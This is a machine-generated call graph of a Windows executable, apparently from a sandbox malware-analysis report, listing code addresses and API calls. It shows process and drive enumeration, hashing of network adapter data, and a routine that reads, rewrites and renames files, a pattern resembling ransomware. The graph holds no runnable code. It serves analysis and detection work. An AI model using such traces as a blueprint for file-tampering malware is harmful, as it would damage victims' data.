__ftell_nolock 39367->39368 39369 e3222d 7 API calls 39368->39369 39370 e322bd K32EnumProcesses 39369->39370 39371 e3228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39369->39371 39372 e322d3 39370->39372 39373 e322df 39370->39373 39371->39370 39372->38894 39374 e32353 39373->39374 39375 e322f0 OpenProcess 39373->39375 39374->38894 39376 e32346 CloseHandle 39375->39376 39377 e3230a K32EnumProcessModules 39375->39377 39376->39374 39376->39375 39377->39376 39378 e3231c K32GetModuleBaseNameW 39377->39378 39847 e40235 39378->39847 39380 e3233e 39380->39376 39381 e32345 39380->39381 39381->39376 39383 e40c62 _malloc 58 API calls 39382->39383 39384 e2ef6e _memset 39383->39384 39385 e2efdc 39384->39385 39386 e40c62 _malloc 58 API calls 39384->39386 39385->38900 39386->39384 39388 e33f05 39387->39388 39393 e33eae 39387->39393 39389 e33fb1 39388->39389 39390 e33f18 39388->39390 39862 e6f23e 59 API calls 2 library calls 39389->39862 39392 e33fbb 39390->39392 39394 e33f2d 39390->39394 39397 e33f3d ___check_float_string 39390->39397 39863 e6f23e 59 API calls 2 library calls 39392->39863 39393->39388 39400 e33ed4 39393->39400 39394->39397 39861 e36760 59 API calls 2 library calls 39394->39861 39397->38900 39402 e33ed9 39400->39402 39403 e33eef 39400->39403 39859 e33da0 59 API calls ___check_float_string 39402->39859 39860 e33da0 59 API calls ___check_float_string 39403->39860 39406 e33eff 39406->38900 39407 e33ee9 39407->38900 39864 e2e670 39408->39864 39410 e2e79e 39411 e33ea0 59 API calls 39410->39411 39412 e2e7c3 39411->39412 39413 e33ff0 59 API calls 39412->39413 39414 e2e7ff 39413->39414 39890 e2e870 39414->39890 39416 e2e806 39417 e33ff0 59 API calls 39416->39417 39418 e2e80d 39416->39418 39417->39418 39418->38960 39420 e35c66 39419->39420 39426 e35c1e 39419->39426 39421 e35c76 39420->39421 39422 e35cff 39420->39422 39424 e36950 59 API calls 39421->39424 39430 e35c88 ___check_float_string 39421->39430 40158 e6f23e 59 API calls 2 library calls 39422->40158 39424->39430 39426->39420 39431 e34690 59 API calls 39426->39431 39430->38964 39431->39420 40159 e33c40 39432->40159 39434 e3288c WideCharToMultiByte 40169 e384e0 39434->40169 39436 e328cf 39436->38967 39438 e3102b CryptCreateHash 39437->39438 39439 e3101a 39437->39439 39441 e31056 lstrlenA CryptHashData 39438->39441 39442 e31045 39438->39442 40180 e50eca RaiseException 39439->40180 39444 e3107f CryptGetHashParam 39441->39444 39445 e3106e 39441->39445 40181 e50eca RaiseException 39442->40181 39446 e3109f 39444->39446 39449 e310b0 _memset 39444->39449 40182 e50eca RaiseException 39445->40182 40183 e50eca RaiseException 39446->40183 39450 e310cf CryptGetHashParam 39449->39450 39451 e310f5 39450->39451 39452 e310e4 39450->39452 39454 e40c62 _malloc 58 API calls 39451->39454 40184 e50eca RaiseException 39452->40184 39455 e31105 _memset 39454->39455 39456 e31148 39455->39456 39457 e404a6 _sprintf 83 API calls 39455->39457 39458 e3114e CryptDestroyHash CryptReleaseContext 39456->39458 39459 e31133 lstrcatA 39457->39459 39458->38969 39459->39455 39459->39456 39461 e340f2 39460->39461 39462 e34009 39460->39462 40188 e6f26c 59 API calls 3 library calls 39461->40188 39464 e34016 39462->39464 39465 e3405d 39462->39465 39466 e340fc 39464->39466 39467 e34022 39464->39467 39468 e34106 39465->39468 39469 e34066 39465->39469 40189 e6f26c 59 API calls 3 library calls 39466->40189 39471 e34044 39467->39471 39472 e3402b 39467->39472 40190 e6f23e 59 API calls 2 library calls 39468->40190 39483 e34078 ___check_float_string 39469->39483 40187 e36760 59 API calls 2 library calls 39469->40187 40186 e32e80 59 API calls _memmove 39471->40186 40185 e32e80 59 API calls _memmove 39472->40185 39478 e3403b 39478->38985 39481 e34054 39481->38985 39483->38985 39488 e33a90 59 API calls 39487->39488 39489 e3294c MultiByteToWideChar 39488->39489 39490 e38400 59 API calls 39489->39490 39491 e3298d 39490->39491 39491->38988 39493 e33591 39492->39493 39494 e335d6 39492->39494 39493->39494 39495 e33597 39493->39495 39498 e335b7 39494->39498 40192 e34f70 59 API calls 39494->40192 39495->39498 40191 e34f70 59 API calls 39495->40191 39498->39007 39500 e33121 39499->39500 39503 e33133 39499->39503 39501 e35c10 59 API calls 39500->39501 39502 e3312c 39501->39502 39502->39033 39504 e35c10 59 API calls 39503->39504 39505 e33159 39504->39505 39505->39033 39507 e32dec 39506->39507 39509 e32dfa 39506->39509 39508 e33ea0 59 API calls 39507->39508 39510 e32df5 39508->39510 39509->39509 39511 e33ea0 59 API calls 39509->39511 39510->39063 39512 e32e11 39511->39512 39512->39063 39514 e32c71 39513->39514 39515 e32c5f 39513->39515 39518 e356d0 59 API calls 39514->39518 39516 e356d0 59 API calls 39515->39516 39517 e32c6a 39516->39517 39517->39068 39519 e32c8a 39518->39519 39519->39068 39521 e33ff0 59 API calls 39520->39521 39522 e32c13 39521->39522 39523 e2ecb0 39522->39523 39525 e2ece5 39523->39525 39526 e2eefc 39525->39526 40193 e41b3b 59 API calls 3 library calls 39525->40193 39526->39093 39527 e2ed6b _memmove 39527->39526 39528 e356d0 59 API calls 39527->39528 39529 e35230 59 API calls 39527->39529 40194 e41b3b 59 API calls 3 library calls 39527->40194 39528->39527 39529->39527 39532 e33742 39531->39532 39533 e336e7 39531->39533 39538 e3370d 39532->39538 40196 e34f70 59 API calls 39532->40196 39533->39532 39534 e336ed 39533->39534 39534->39538 40195 e34f70 59 API calls 39534->40195 39536 e3377f 39540 e2ca70 39536->39540 39538->39536 39539 e34690 59 API calls 39538->39539 39539->39536 39544 e2cb64 39540->39544 39546 e2caa3 39540->39546 39541 e2cb6b 40197 e6f26c 59 API calls 3 library calls 39541->40197 39543 e2cb75 39543->39076 39544->39076 39545 e336c0 59 API calls 39545->39546 39546->39541 39546->39544 39546->39545 39548 e34690 59 API calls 39547->39548 39549 e330d4 39548->39549 39550 e2c740 39549->39550 40198 e40fdd 39550->40198 39553 e2c944 CreateDirectoryW 39555 e40fdd 115 API calls 39553->39555 39560 e2c960 39555->39560 39556 e2c90e 39556->39553 39564 e2c96a 39556->39564 39557 e2c906 40221 e43a38 39557->40221 39560->39564 39570 e2c9d5 39560->39570 40234 e428fd 82 API calls 6 library calls 39560->40234 39562 e2c9ed 40236 e428fd 82 API calls 6 library calls 39562->40236 39563 e40546 58 API calls 39573 e2c79e _memmove 39563->39573 39564->39082 39567 e2c9f8 39569 e43a38 __fcloseall 83 API calls 39567->39569 39568 e35c10 59 API calls 39568->39573 39571 e2c9fe 39569->39571 40235 e428fd 82 API calls 6 library calls 39570->40235 39571->39564 39572 e34f70 59 API calls 39572->39573 39573->39557 39573->39563 39573->39568 39573->39572 40208 e41101 39573->40208 39575 e31223 GetFileSizeEx 39574->39575 39590 e31287 39574->39590 39576 e312a3 VirtualAlloc 39575->39576 39577 e31234 39575->39577 39579 e312c0 _memset 39576->39579 39580 e3131a CloseHandle 39576->39580 39577->39576 39578 e3123c CloseHandle 39577->39578 39581 e33100 59 API calls 39578->39581 39586 e312e9 SetFilePointerEx 39579->39586 39618 e313a7 39579->39618 39580->39085 39582 e31253 39581->39582 40652 e359d0 39582->40652 39584 e313b7 SetFilePointer 39589 e313f5 ReadFile 39584->39589 39657 e315ae 39584->39657 39585 e3126a MoveFileW 39585->39590 39587 e31332 ReadFile 39586->39587 39588 e3130c VirtualFree 39586->39588 39587->39588 39591 e3134f 39587->39591 39588->39580 39592 e31440 39589->39592 39593 e3140f VirtualFree CloseHandle 39589->39593 39590->39085 39591->39588 39595 e31356 39591->39595 39598 e31471 lstrlenA 39592->39598 39599 e31718 lstrlenA 39592->39599 39592->39657 39596 e3142f 39593->39596 39594 e315c5 SetFilePointerEx 39594->39593 39597 e315df 39594->39597 39595->39584 39602 e32c40 59 API calls 39595->39602 39596->39085 39600 e315ed WriteFile 39597->39600 39604 e31602 39597->39604 40678 e40be4 39598->40678 40730 e40be4 39599->40730 39600->39593 39600->39604 39607 e31364 39602->39607 39605 e330b0 59 API calls 39604->39605 39609 e31631 39605->39609 39607->39618 39619 e31379 VirtualFree CloseHandle 39607->39619 39610 e32840 60 API calls 39609->39610 39613 e3163c WriteFile 39610->39613 39621 e31658 39613->39621 39618->39584 39622 e31396 39619->39622 39621->39593 39624 e31660 lstrlenA WriteFile 39621->39624 39622->39085 39624->39593 39626 e31686 CloseHandle 39624->39626 39627 e33100 59 API calls 39626->39627 39628 e316a3 39627->39628 39629 e359d0 59 API calls 39628->39629 39631 e316be MoveFileW 39629->39631 39633 e316e4 VirtualFree 39631->39633 39637 e318a7 39631->39637 39638 e316fc 39633->39638 39641 e318e3 39637->39641 39642 e318d5 VirtualFree 39637->39642 39638->39085 39641->39590 39643 e318e8 CloseHandle 39641->39643 39642->39641 39643->39590 39657->39594 39659->39088 39661 e3babb ShowWindow UpdateWindow 39660->39661 39662 e3bab9 39660->39662 39661->39090 39662->39090 39664 e30a81 39663->39664 39665 e30bb4 39664->39665 39666 e356d0 59 API calls 39664->39666 39667 e33ea0 59 API calls 39664->39667 39670 e33ff0 59 API calls 39664->39670 39671 e32900 60 API calls 39664->39671 39672 e33580 59 API calls 39664->39672 39665->39094 39666->39664 39668 e30ae0 SetErrorMode PathFileExistsA SetErrorMode 39667->39668 39668->39664 39669 e30b0c GetDriveTypeA 39668->39669 39669->39664 39670->39664 39671->39664 39672->39664 39674 e3d3c0 59 API calls 39673->39674 39675 e3c347 39674->39675 39676 e3c35b 39675->39676 40821 e6f23e 59 API calls 2 library calls 39675->40821 39676->39120 39680 e3d340 59 API calls 39679->39680 39681 e3c257 39680->39681 39682 e3c26b 39681->39682 40822 e6f23e 59 API calls 2 library calls 39681->40822 39682->39120 39686 e3b8d6 39685->39686 39689 e3b8e0 39685->39689 39687 e34690 59 API calls 39686->39687 39687->39689 39688 e3b916 39691 e3b930 39688->39691 39692 e34690 59 API calls 39688->39692 39689->39688 39690 e34690 59 API calls 39689->39690 39690->39688 39693 e3b94a 39691->39693 39694 e34690 59 API calls 39691->39694 39692->39691 39695 e3b964 39693->39695 39696 e34690 59 API calls 39693->39696 39694->39693 40823 e3bfd0 39695->40823 39696->39695 39698 e3b976 39699 e3bfd0 59 API calls 39698->39699 39700 e3b988 39699->39700 39701 e3bfd0 59 API calls 39700->39701 39702 e3b99a 39701->39702 39703 e3b9b4 39702->39703 39704 e34690 59 API calls 39702->39704 39705 e3b9f2 39703->39705 39706 e33ff0 59 API calls 39703->39706 39704->39703 39705->39120 39706->39705 39708 e3326f 39707->39708 39709 e3327d 39707->39709 39710 e35c10 59 API calls 39708->39710 39712 e35c10 59 API calls 39709->39712 39711 e33278 39710->39711 39711->39120 39713 e3329c 39712->39713 39713->39120 39714->39120 40844 e3f130 timeGetTime 39714->40844 39715->39100 41044 e3fd80 39715->41044 39716->38872 39718 e31ad0 39717->39718 39719 e31af4 39717->39719 39720 e31afc 39718->39720 39721 e31adc DispatchMessageW PeekMessageW 39718->39721 39719->38916 39720->38916 39721->39718 39721->39719 39723 e346a9 39722->39723 39724 e3478c 39722->39724 39726 e346b6 39723->39726 39727 e346e9 39723->39727 41058 e6f26c 59 API calls 3 library calls 39724->41058 39728 e34796 39726->39728 39729 e346c2 39726->39729 39730 e347a0 39727->39730 39731 e346f5 39727->39731 41059 e6f26c 59 API calls 3 library calls 39728->41059 41057 e33340 59 API calls _memmove 39729->41057 41060 e6f23e 59 API calls 2 library calls 39730->41060 39735 e36950 59 API calls 39731->39735 39744 e34707 ___check_float_string 39731->39744 39735->39744 39740 e346e0 39740->38919 39744->38919 39745->38941 39746->38917 39747->39061 39748->39093 39752 e35735 39751->39752 39758 e356de 39751->39758 39753 e3573e 39752->39753 39754 e357bc 39752->39754 39760 e35750 ___check_float_string 39753->39760 39772 e36760 59 API calls 2 library calls 39753->39772 39773 e6f23e 59 API calls 2 library calls 39754->39773 39758->39752 39762 e35704 39758->39762 39760->39296 39764 e35709 39762->39764 39765 e3571f 39762->39765 39766 e33ff0 59 API calls 39764->39766 39767 e33ff0 59 API calls 39765->39767 39768 e35719 39766->39768 39769 e3572f 39767->39769 39768->39296 39769->39296 39770->39300 39771->39302 39772->39760 39780 e43b4c 39774->39780 39776 e3ccca 39779 e3a00a 39776->39779 39790 e6f1bb 59 API calls 3 library calls 39776->39790 39779->38875 39779->38876 39784 e43b54 39780->39784 39781 e40c62 _malloc 58 API calls 39781->39784 39782 e43b6e 39782->39776 39784->39781 39784->39782 39785 e43b72 std::exception::exception 39784->39785 39791 e4793d DecodePointer 39784->39791 39792 e50eca RaiseException 39785->39792 39787 e43b9c 39793 e50d91 58 API calls _free 39787->39793 39789 e43bae 39789->39776 39791->39784 39792->39787 39793->39789 39795 e43b4c 59 API calls 39794->39795 39796 e3cc5d 39795->39796 39798 e3cc64 39796->39798 39801 e6f1bb 59 API calls 3 library calls 39796->39801 39798->39309 39800 e3d740 59 API calls 39798->39800 39800->39309 39805 e35d66 39804->39805 39806 e35dfe 39804->39806 39812 e35d84 ___check_float_string 39805->39812 39815 e36950 39805->39815 39824 e6f23e 59 API calls 2 library calls 39806->39824 39810 e35d76 39810->39326 39812->39326 39814->39326 39816 e36986 39815->39816 39817 e369d3 39816->39817 39818 e43b4c 59 API calls 39816->39818 39820 e36a0d ___check_float_string 39816->39820 39817->39820 39825 e6f1bb 59 API calls 3 library calls 39817->39825 39818->39817 39820->39810 39829 e51570 39826->39829 39831 e51580 39829->39831 39830 e51586 39832 e45208 __strtod_l 58 API calls 39830->39832 39831->39830 39837 e515ae 39831->39837 39833 e5158b 39832->39833 39840 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39833->39840 39836 e3a36e lstrcpyW lstrcpyW 39836->38909 39838 e515cf wcstoxq 39837->39838 39841 e4e883 GetStringTypeW 39837->39841 39838->39836 39839 e45208 __strtod_l 58 API calls 39838->39839 39839->39836 39840->39836 39841->39837 39843 e31cf2 RegOpenKeyExW 39842->39843 39843->39333 39843->39334 39845 e34690 59 API calls 39844->39845 39846 e33550 39845->39846 39846->39349 39848 e402b6 39847->39848 39849 e40241 39847->39849 39858 e402c8 60 API calls 3 library calls 39848->39858 39851 e45208 __strtod_l 58 API calls 39849->39851 39856 e40266 39849->39856 39853 e4024d 39851->39853 39852 e402c3 39852->39380 39857 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39853->39857 39855 e40258 39855->39380 39856->39380 39857->39855 39858->39852 39859->39407 39860->39406 39861->39397 39865 e40c62 _malloc 58 API calls 39864->39865 39866 e2e684 39865->39866 39867 e40c62 _malloc 58 API calls 39866->39867 39868 e2e690 39867->39868 39869 e2e6b4 GetAdaptersInfo 39868->39869 39870 e2e699 39868->39870 39872 e2e6c4 39869->39872 39873 e2e6db GetAdaptersInfo 39869->39873 39871 e41f2d _wprintf 85 API calls 39870->39871 39875 e2e6a3 39871->39875 39876 e40bed _free 58 API calls 39872->39876 39874 e2e6ea 39873->39874 39889 e2e741 39873->39889 39914 e404a6 39874->39914 39878 e40bed _free 58 API calls 39875->39878 39880 e2e6ca 39876->39880 39882 e2e6a9 39878->39882 39879 e40bed _free 58 API calls 39883 e2e74a 39879->39883 39884 e40c62 _malloc 58 API calls 39880->39884 39882->39410 39883->39410 39886 e2e6d2 39884->39886 39886->39870 39886->39873 39887 e2e737 39888 e41f2d _wprintf 85 API calls 39887->39888 39888->39889 39889->39879 39891 e356d0 59 API calls 39890->39891 39892 e2e8bb CryptAcquireContextW 39891->39892 39893 e2e8d8 39892->39893 39894 e2e8e9 CryptCreateHash 39892->39894 40153 e50eca RaiseException 39893->40153 39896 e2e903 39894->39896 39897 e2e914 CryptHashData 39894->39897 40154 e50eca RaiseException 39896->40154 39899 e2e932 39897->39899 39900 e2e943 CryptGetHashParam 39897->39900 40155 e50eca RaiseException 39899->40155 39902 e2e963 39900->39902 39904 e2e974 _memset 39900->39904 40156 e50eca RaiseException 39902->40156 39905 e2e993 CryptGetHashParam 39904->39905 39906 e2e9a8 39905->39906 39913 e2e9b9 39905->39913 40157 e50eca RaiseException 39906->40157 39908 e2ea10 39910 e2ea16 CryptDestroyHash CryptReleaseContext 39908->39910 39909 e404a6 _sprintf 83 API calls 39909->39913 39911 e2ea33 39910->39911 39911->39416 39912 e33ea0 59 API calls 39912->39913 39913->39908 39913->39909 39913->39912 39915 e404d7 39914->39915 39916 e404c2 39914->39916 39915->39916 39918 e404de 39915->39918 39917 e45208 __strtod_l 58 API calls 39916->39917 39919 e404c7 39917->39919 39943 e46ab6 39918->39943 39942 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39919->39942 39922 e2e725 39925 e41f2d 39922->39925 39923 e40504 39923->39922 39967 e464ef 78 API calls 7 library calls 39923->39967 39926 e41f39 __setmbcp 39925->39926 39927 e41f5f __wassert 39926->39927 39928 e41f4a 39926->39928 40002 e40e92 39927->40002 39929 e45208 __strtod_l 58 API calls 39928->39929 39930 e41f4f 39929->39930 40018 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39930->40018 39933 e41f6f __wassert 40007 e4afd2 39933->40007 39934 e41f5a __setmbcp 39934->39887 39936 e41f82 __wassert 39937 e46ab6 __output_l 83 API calls 39936->39937 39938 e41f9b __wassert 39937->39938 40014 e4afa1 39938->40014 39942->39922 39968 e4019c 39943->39968 39946 e45208 __strtod_l 58 API calls 39947 e46b30 39946->39947 39948 e47601 39947->39948 39957 e46b50 __aulldvrm __woutput_l _strlen 39947->39957 39983 e4816b 39947->39983 39949 e45208 __strtod_l 58 API calls 39948->39949 39951 e47606 39949->39951 39991 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39951->39991 39952 e475db 39976 e4a77e 39952->39976 39955 e475fd 39955->39923 39957->39948 39957->39952 39958 e4766a 78 API calls __output_l 39957->39958 39959 e471b9 DecodePointer 39957->39959 39960 e40bed _free 58 API calls 39957->39960 39961 e5adf7 60 API calls __cftof 39957->39961 39962 e48cde __malloc_crt 58 API calls 39957->39962 39963 e4721c DecodePointer 39957->39963 39964 e476de 78 API calls _write_string 39957->39964 39965 e47241 DecodePointer 39957->39965 39966 e476b2 78 API calls _write_multi_char 39957->39966 39990 e42bcc 58 API calls _LocaleUpdate::_LocaleUpdate 39957->39990 39958->39957 39959->39957 39960->39957 39961->39957 39962->39957 39963->39957 39964->39957 39965->39957 39966->39957 39967->39922 39969 e401ad 39968->39969 39975 e401fa 39968->39975 39992 e45007 39969->39992 39971 e401b3 39972 e401da 39971->39972 39997 e445dc 58 API calls 6 library calls 39971->39997 39972->39975 39998 e4495e 58 API calls 5 library calls 39972->39998 39975->39946 39977 e4a786 39976->39977 39978 e4a788 IsProcessorFeaturePresent 39976->39978 39977->39955 39980 e4ab9c 39978->39980 40000 e4ab4b 5 API calls ___raise_securityfailure 39980->40000 39982 e4ac7f 39982->39955 39984 e48175 39983->39984 39985 e4818a 39983->39985 39986 e45208 __strtod_l 58 API calls 39984->39986 39985->39957 39987 e4817a 39986->39987 40001 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 39987->40001 39989 e48185 39989->39957 39990->39957 39991->39952 39993 e4501f __getptd_noexit 58 API calls 39992->39993 39994 e4500d 39993->39994 39995 e4501a 39994->39995 39999 e47c2e 58 API calls 3 library calls 39994->39999 39995->39971 39997->39972 39998->39975 40000->39982 40001->39989 40003 e40eb3 EnterCriticalSection 40002->40003 40004 e40e9d 40002->40004 40003->39933 40005 e48af7 __lock 58 API calls 40004->40005 40006 e40ea6 40005->40006 40006->39933 40008 e4816b __filbuf 58 API calls 40007->40008 40009 e4afdf 40008->40009 40020 e589c2 40009->40020 40011 e4b034 40011->39936 40012 e4afe5 __wassert 40012->40011 40013 e48cde __malloc_crt 58 API calls 40012->40013 40013->40011 40015 e4afaa 40014->40015 40016 e41faf 40014->40016 40015->40016 40030 e4836b 40015->40030 40019 e41fc9 LeaveCriticalSection LeaveCriticalSection __wassert __getstream 40016->40019 40018->39934 40019->39934 40021 e589cd 40020->40021 40022 e589da 40020->40022 40023 e45208 __strtod_l 58 API calls 40021->40023 40024 e589e6 40022->40024 40025 e45208 __strtod_l 58 API calls 40022->40025 40026 e589d2 40023->40026 40024->40012 40027 e58a07 40025->40027 40026->40012 40029 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40027->40029 40029->40026 40031 e4837e 40030->40031 40032 e483a2 40030->40032 40031->40032 40033 e4816b __filbuf 58 API calls 40031->40033 40032->40016 40034 e4839b 40033->40034 40036 e4df14 40034->40036 40037 e4df20 __setmbcp 40036->40037 40038 e4df2d 40037->40038 40040 e4df44 40037->40040 40136 e451d4 58 API calls __getptd_noexit 40038->40136 40039 e4dfe3 40140 e451d4 58 API calls __getptd_noexit 40039->40140 40040->40039 40043 e4df58 40040->40043 40042 e4df32 40045 e45208 __strtod_l 58 API calls 40042->40045 40046 e4df76 40043->40046 40047 e4df80 40043->40047 40057 e4df39 __setmbcp 40045->40057 40137 e451d4 58 API calls __getptd_noexit 40046->40137 40064 e5b134 40047->40064 40048 e4df7b 40052 e45208 __strtod_l 58 API calls 40048->40052 40051 e4df86 40053 e4dfac 40051->40053 40054 e4df99 40051->40054 40055 e4dfef 40052->40055 40056 e45208 __strtod_l 58 API calls 40053->40056 40073 e4e003 40054->40073 40141 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40055->40141 40060 e4dfb1 40056->40060 40057->40032 40138 e451d4 58 API calls __getptd_noexit 40060->40138 40061 e4dfa5 40139 e4dfdb LeaveCriticalSection __unlock_fhandle 40061->40139 40065 e5b140 __setmbcp 40064->40065 40066 e5b18f EnterCriticalSection 40065->40066 40067 e48af7 __lock 58 API calls 40065->40067 40068 e5b1b5 __setmbcp 40066->40068 40069 e5b165 40067->40069 40068->40051 40070 e5b17d 40069->40070 40142 e5263e InitializeCriticalSectionAndSpinCount 40069->40142 40143 e5b1b9 LeaveCriticalSection _doexit 40070->40143 40074 e4e010 __ftell_nolock 40073->40074 40075 e4e06e 40074->40075 40076 e4e04f 40074->40076 40106 e4e044 40074->40106 40080 e4e0c6 40075->40080 40081 e4e0aa 40075->40081 40144 e451d4 58 API calls __getptd_noexit 40076->40144 40077 e4a77e __strtod_l 6 API calls 40082 e4e864 40077->40082 40079 e4e054 40083 e45208 __strtod_l 58 API calls 40079->40083 40084 e4e0df 40080->40084 40148 e4f744 60 API calls 3 library calls 40080->40148 40146 e451d4 58 API calls __getptd_noexit 40081->40146 40082->40061 40086 e4e05b 40083->40086 40088 e589c2 __flsbuf 58 API calls 40084->40088 40145 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40086->40145 40091 e4e0ed 40088->40091 40089 e4e0af 40092 e45208 __strtod_l 58 API calls 40089->40092 40093 e4e446 40091->40093 40098 e45007 _TestDefaultLanguage 58 API calls 40091->40098 40094 e4e0b6 40092->40094 40095 e4e464 40093->40095 40096 e4e7d9 WriteFile 40093->40096 40147 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40094->40147 40099 e4e588 40095->40099 40109 e4e47a 40095->40109 40100 e4e678 40096->40100 40101 e4e439 GetLastError 40096->40101 40103 e4e119 GetConsoleMode 40098->40103 40111 e4e593 40099->40111 40114 e4e67d 40099->40114 40102 e4e406 40100->40102 40101->40102 40104 e4e812 40102->40104 40102->40106 40113 e4e566 40102->40113 40103->40093 40105 e4e158 40103->40105 40104->40106 40107 e45208 __strtod_l 58 API calls 40104->40107 40105->40093 40108 e4e168 GetConsoleCP 40105->40108 40106->40077 40112 e4e840 40107->40112 40108->40104 40129 e4e197 40108->40129 40109->40102 40109->40104 40110 e4e4e9 WriteFile 40109->40110 40110->40101 40110->40109 40111->40104 40115 e4e5f8 WriteFile 40111->40115 40152 e451d4 58 API calls __getptd_noexit 40112->40152 40117 e4e571 40113->40117 40118 e4e809 40113->40118 40114->40104 40119 e4e6f2 WideCharToMultiByte 40114->40119 40115->40101 40120 e4e647 40115->40120 40121 e45208 __strtod_l 58 API calls 40117->40121 40151 e451e7 58 API calls 3 library calls 40118->40151 40119->40101 40128 e4e739 40119->40128 40120->40100 40120->40102 40120->40111 40124 e4e576 40121->40124 40123 e4e741 WriteFile 40126 e4e794 GetLastError 40123->40126 40123->40128 40150 e451d4 58 API calls __getptd_noexit 40124->40150 40126->40128 40128->40100 40128->40102 40128->40114 40128->40123 40129->40102 40130 e5c76c 60 API calls __fgetwc_nolock 40129->40130 40131 e4e280 WideCharToMultiByte 40129->40131 40134 e4e2ed 40129->40134 40149 e42d33 58 API calls __isleadbyte_l 40129->40149 40130->40129 40131->40102 40132 e4e2bb WriteFile 40131->40132 40132->40101 40132->40134 40133 e6058c WriteConsoleW CreateFileW __putwch_nolock 40133->40134 40134->40101 40134->40102 40134->40129 40134->40133 40135 e4e315 WriteFile 40134->40135 40135->40101 40135->40134 40136->40042 40137->40048 40138->40061 40139->40057 40140->40048 40141->40057 40142->40070 40143->40066 40144->40079 40145->40106 40146->40089 40147->40106 40148->40084 40149->40129 40150->40106 40151->40106 40152->40106 40153->39894 40154->39897 40155->39900 40156->39904 40157->39913 40160 e33c62 40159->40160 40166 e33c74 _memset 40159->40166 40161 e33c67 40160->40161 40162 e33c96 40160->40162 40163 e43b4c 59 API calls 40161->40163 40176 e6f23e 59 API calls 2 library calls 40162->40176 40165 e33c6d 40163->40165 40165->40166 40177 e6f1bb 59 API calls 3 library calls 40165->40177 40166->39434 40170 e38513 40169->40170 40175 e38520 40169->40175 40170->40175 40178 e35810 59 API calls ___check_float_string 40170->40178 40171 e38619 40171->39436 40173 e6f23e 59 API calls 40173->40175 40175->40171 40175->40173 40179 e36760 59 API calls 2 library calls 40175->40179 40178->40175 40179->40175 40180->39438 40181->39441 40182->39444 40183->39449 40184->39451 40185->39478 40186->39481 40187->39483 40188->39466 40189->39468 40191->39498 40192->39498 40193->39527 40194->39527 40195->39538 40196->39538 40197->39543 40237 e41037 40198->40237 40200 e2c78a 40200->39556 40201 e40546 40200->40201 40202 e40564 40201->40202 40203 e40550 40201->40203 40202->39573 40204 e45208 __strtod_l 58 API calls 40203->40204 40205 e40555 40204->40205 40437 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40205->40437 40207 e40560 40207->39573 40210 e4110d __setmbcp 40208->40210 40209 e4111e 40211 e45208 __strtod_l 58 API calls 40209->40211 40210->40209 40212 e4114c 40210->40212 40213 e41123 40211->40213 40216 e4112e __setmbcp 40212->40216 40438 e40e53 40212->40438 40483 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40213->40483 40216->39573 40217 e4117d 40484 e411b5 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 40217->40484 40220 e4115b 40220->40217 40444 e49312 40220->40444 40222 e43a44 __setmbcp 40221->40222 40223 e43a70 40222->40223 40224 e43a58 40222->40224 40227 e40e53 __lock_file 59 API calls 40223->40227 40230 e43a68 __setmbcp 40223->40230 40225 e45208 __strtod_l 58 API calls 40224->40225 40226 e43a5d 40225->40226 40647 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40226->40647 40229 e43a82 40227->40229 40631 e439cc 40229->40631 40230->39556 40234->39560 40235->39562 40236->39567 40240 e41043 __setmbcp 40237->40240 40238 e41056 40239 e45208 __strtod_l 58 API calls 40238->40239 40241 e4105b 40239->40241 40240->40238 40242 e41087 40240->40242 40286 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40241->40286 40256 e48df4 40242->40256 40245 e4108c 40246 e41095 40245->40246 40247 e410a2 40245->40247 40248 e45208 __strtod_l 58 API calls 40246->40248 40249 e410cc 40247->40249 40250 e410ac 40247->40250 40253 e41066 @_EH4_CallFilterFunc@8 __setmbcp 40248->40253 40271 e48f13 40249->40271 40251 e45208 __strtod_l 58 API calls 40250->40251 40251->40253 40253->40200 40257 e48e00 __setmbcp 40256->40257 40258 e48af7 __lock 58 API calls 40257->40258 40268 e48e0e 40258->40268 40259 e48e82 40288 e48f0a 40259->40288 40260 e48e89 40262 e48cde __malloc_crt 58 API calls 40260->40262 40264 e48e90 40262->40264 40263 e48eff __setmbcp 40263->40245 40264->40259 40292 e5263e InitializeCriticalSectionAndSpinCount 40264->40292 40265 e40e92 __getstream 59 API calls 40265->40268 40267 e48b9f __mtinitlocknum 58 API calls 40267->40268 40268->40259 40268->40260 40268->40265 40268->40267 40291 e40efc LeaveCriticalSection LeaveCriticalSection _doexit 40268->40291 40269 e48eb6 EnterCriticalSection 40269->40259 40280 e48f33 __wopenfile 40271->40280 40272 e48f4d 40273 e45208 __strtod_l 58 API calls 40272->40273 40275 e48f52 40273->40275 40274 e49108 40274->40272 40278 e4916b 40274->40278 40297 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40275->40297 40277 e410d7 40287 e410f9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 40277->40287 40294 e5c214 40278->40294 40280->40272 40280->40274 40298 e5c232 60 API calls 2 library calls 40280->40298 40282 e49101 40282->40274 40299 e5c232 60 API calls 2 library calls 40282->40299 40284 e49120 40284->40274 40300 e5c232 60 API calls 2 library calls 40284->40300 40286->40253 40287->40253 40293 e48c81 LeaveCriticalSection 40288->40293 40290 e48f11 40290->40263 40291->40268 40292->40269 40293->40290 40301 e5b9f8 40294->40301 40296 e5c22d 40296->40277 40297->40277 40298->40282 40299->40284 40300->40274 40304 e5ba04 __setmbcp 40301->40304 40302 e5ba1a 40303 e45208 __strtod_l 58 API calls 40302->40303 40305 e5ba1f 40303->40305 40304->40302 40306 e5ba50 40304->40306 40384 e442d2 9 API calls __invalid_parameter_noinfo_noreturn 40305->40384 40312 e5bac1 40306->40312 40311 e5ba29 __setmbcp 40311->40296 40313 e5bae1 40312->40313 40386 e67f50 40313->40386 40315 e5bc34 40432 e442fd 8 API calls 2 library calls 40315->40432 40317 e5c213 40318 